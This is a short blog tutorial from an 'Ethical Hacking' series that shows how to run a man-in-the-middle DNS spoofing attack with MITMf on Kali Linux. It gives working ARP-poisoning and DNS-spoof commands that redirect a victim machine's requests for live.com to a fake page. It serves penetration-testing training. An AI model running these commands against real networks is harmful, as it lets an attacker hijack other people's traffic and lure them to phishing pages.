Ethical Hacking - NETWORK PENETRATION TESTING(19)

MITM-DNS Spoofing

DNS Spoofing allows us to redirect any request to a certain domain to another domain, for example we can redirect any request from live.com to a fake page !!

1. Edit DNS settings

leafpad /etc/mitmf/mitms.conf

2. Run ettercap to arp poison the target(s) and enable the dns_spoof plugin.

mitmf --arp --apoof --gateway [GATEWAY IP] --targets [TARGET IP] -i eth0 --dns

 

>>Following is the local index page on Kali Linux.

>> Modify and save the config file.

 

 

 

 >>Run the MITMf tool

python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --target 10.0.0.22 -i eth0 --dns

 

 

 

>>Visit www.live.com on the victim PC. It works.....

posted @ 2019-12-11 21:29  晨风_Eric  阅读(122)  评论(0编辑  收藏  举报